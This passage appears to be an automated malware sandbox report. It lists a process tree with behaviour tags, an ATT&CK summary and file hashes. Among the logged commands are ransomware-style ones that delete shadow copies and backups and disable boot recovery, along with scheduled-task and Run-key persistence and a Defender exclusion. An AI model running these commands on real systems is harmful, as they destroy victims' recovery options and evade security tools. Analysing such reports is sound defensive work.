- Suspicious use of FindShellTrayWindow
PID:5880
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies registry class
PID:6472 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6F4DC6C9CEC08FA7281405D11FA613DE C2⤵
- Loads dropped DLL
PID:7696
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F12F4648377A172ADA2B4F4B90B50024 C2⤵
- Loads dropped DLL
PID:6868
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 55A5131627F4B6DF0E41D263EAD876BD2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4152
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 8DCD8B8042E8F550EAF73ABF9C0B1673 C2⤵
- Loads dropped DLL
PID:8284
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
PID:9436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_DA55.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:9800
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F8139014CDD041E94F0B3CF1E2E081572⤵PID:11084
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:8780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5740
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7CCCBFAF4E30CDDD27D6FCD8A9B977FD E Global\MSI00002⤵PID:2124
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8148 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:8176
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8732
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8848
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:8576
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9524
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8812 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4176
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7444
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:9384 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1f5d8a52-23ee-1e46-b487-1c2ddd6e740d}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000188" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:8276
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000184"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6640
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9472
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5884
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:356
-
C:\Users\Admin\AppData\Local\Temp\4FB4.exeC:\Users\Admin\AppData\Local\Temp\4FB4.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:692
-
C:\Users\Admin\AppData\Local\Temp\5477.exeC:\Users\Admin\AppData\Local\Temp\5477.exe1⤵PID:8660
-
C:\Users\Admin\AppData\Local\Temp\6B5C.exeC:\Users\Admin\AppData\Local\Temp\6B5C.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9308
-
C:\Users\Admin\AppData\Local\Temp\7DEB.exeC:\Users\Admin\AppData\Local\Temp\7DEB.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7948 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Loads dropped DLL
PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\8B3A.exeC:\Users\Admin\AppData\Local\Temp\8B3A.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8484
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9040
-
C:\Users\Admin\AppData\Local\Temp\A5A9.exeC:\Users\Admin\AppData\Local\Temp\A5A9.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9760 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:6540
-
-
C:\Users\Admin\AppData\Local\Temp\B47E.exeC:\Users\Admin\AppData\Local\Temp\B47E.exe1⤵PID:2324
-
C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"2⤵PID:6572
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\3⤵PID:9636
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\4⤵PID:8976
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F3⤵
- Creates scheduled task(s)
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\DF29.exeC:\Users\Admin\AppData\Local\Temp\DF29.exe1⤵
- Windows security modification
- Suspicious use of SetThreadContext
PID:6688 -
C:\Users\Admin\AppData\Local\Temp\df23c9ba-2cc7-4526-be9c-450d5dc86460\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\df23c9ba-2cc7-4526-be9c-450d5dc86460\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\df23c9ba-2cc7-4526-be9c-450d5dc86460\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵PID:8032
-
C:\Users\Admin\AppData\Local\Temp\df23c9ba-2cc7-4526-be9c-450d5dc86460\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\df23c9ba-2cc7-4526-be9c-450d5dc86460\AdvancedRun.exe" /SpecialRun 4101d8 80323⤵PID:7096
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\DF29.exe" -Force2⤵PID:8348
-
-
C:\Users\Admin\AppData\Local\Temp\DF29.exeC:\Users\Admin\AppData\Local\Temp\DF29.exe2⤵
- Modifies system certificate store
PID:6852
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5968 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5848
-
-
C:\Users\Admin\AppData\Local\Temp\725.exeC:\Users\Admin\AppData\Local\Temp\725.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9904
-
C:\Users\Admin\AppData\Local\Temp\1213.exeC:\Users\Admin\AppData\Local\Temp\1213.exe1⤵
- Enumerates connected drives
- Checks processor information in registry
PID:6944 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 1213.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1213.exe" & del C:\ProgramData\*.dll & exit2⤵PID:6052
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 1213.exe /f3⤵
- Kills process with taskkill
PID:10604
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:9076
-
-
-
C:\Users\Admin\AppData\Local\Temp\1D10.exeC:\Users\Admin\AppData\Local\Temp\1D10.exe1⤵
- Adds Run key to start application
- Checks whether UAC is enabled
PID:4276 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start2⤵
- Enumerates connected drives
PID:5256 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -agent 03⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Drops file in Windows directory
PID:7608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:9940
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:11136
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:656
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:10928
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:10920
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:7356
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:11024
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:8896
-
-
-
C:\Users\Admin\AppData\Local\Temp\1F72.exeC:\Users\Admin\AppData\Local\Temp\1F72.exe1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7452
-
C:\Users\Admin\AppData\Local\Temp\27E0.exeC:\Users\Admin\AppData\Local\Temp\27E0.exe1⤵
- Suspicious use of SetThreadContext
PID:9888 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵PID:1332
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:9640 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:8740
-
-
C:\Users\Admin\AppData\Local\Temp\43D5.exeC:\Users\Admin\AppData\Local\Temp\43D5.exe1⤵PID:6844
-
C:\Windows\SysWOW64\dusmapi\dllhost.exe"C:\Windows\System32\dusmapi\dllhost.exe"2⤵
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:7676
-
-
C:\Users\Admin\AppData\Local\Temp\620C.exeC:\Users\Admin\AppData\Local\Temp\620C.exe1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6192
-
C:\Users\Admin\AppData\Local\Temp\72E6.exeC:\Users\Admin\AppData\Local\Temp\72E6.exe1⤵PID:8596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
- Loads dropped DLL
PID:8660
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9352
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9708
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9156
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:6464
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10220
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:8948
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6812
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:9564
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10352
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10444
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "rundll32" /sc ONLOGON /tr "'C:\Boot\pt-PT\rundll32.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:7744
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9864
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5804
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9884
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1208
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4904
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:11232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4408
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:10568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6792
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:9352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\dusmapi\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:10708
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:9036
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Windows\SysWOW64\setupcln\msiexec.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:8704
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:7032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "5504337" /sc ONLOGON /tr "'C:\ProgramData\59\5504337.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5992
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:8532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies registry class
PID:6512
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4181⤵PID:11048
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8600
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6624
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:10752
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:9708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5868
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7032
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10480
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:10940
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
4File Deletion
2Install Root Certificate
1Modify Registry
7Virtualization/Sandbox Evasion
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9499dac59e041d057327078ccada8329
SHA1707088977b09835d2407f91f4f6dbe4a4c8f2fff
SHA256ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9
SHA5129d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397
-
MD5
9499dac59e041d057327078ccada8329
SHA1707088977b09835d2407f91f4f6dbe4a4c8f2fff
SHA256ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9
SHA5129d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397
-
MD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
MD5
aed57d50123897b0012c35ef5dec4184
SHA1568571b12ca44a585df589dc810bf53adf5e8050
SHA256096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e
SHA512ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c
-
MD5
a3ec5ee946f7b93287ba9cf7facc6647
SHA13595b700f8e41d45d8a8d15b42cd00cc19922647
SHA2565816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0
SHA51263efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6
-
MD5
a3ec5ee946f7b93287ba9cf7facc6647
SHA13595b700f8e41d45d8a8d15b42cd00cc19922647
SHA2565816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0
SHA51263efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5440c646b798c1484e9084a1a2dca8b12
SHA130c126f6d3aff2aeabf8675c7ab3c2b4d58f41f2
SHA2566af7477bdffe834a6b21ea50bc9d719f8e63cedc79e6ea64a6b585a9d7ee18b2
SHA512258842f4d283f5a5b94a17b54d0945e7dbcdf7dad061f8e244d9e9e836df1bdd4b2bafeb742da12ac6c87df41d4ec4a47f0ba96536d3f643d2410f1ea4720be2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD513fb292004efd2ab0217d8cc1389d063
SHA16b4e78825b44661b14be8866753da861a4214592
SHA25620ae8a4952dc4f1171464fa2a1df03445a636ad34cdad071d11abba7c21df937
SHA512c03e1056ded505eeb9cb9af907e0210775079832ad75d502bf8be9ad4e87c99632aab7efc7223ff3169d70eee6141e4d96da81f02a1c6e6aa68f4df2e764bd7d
-
MD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
MD5
b7161c0845a64ff6d7345b67ff97f3b0
SHA1d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
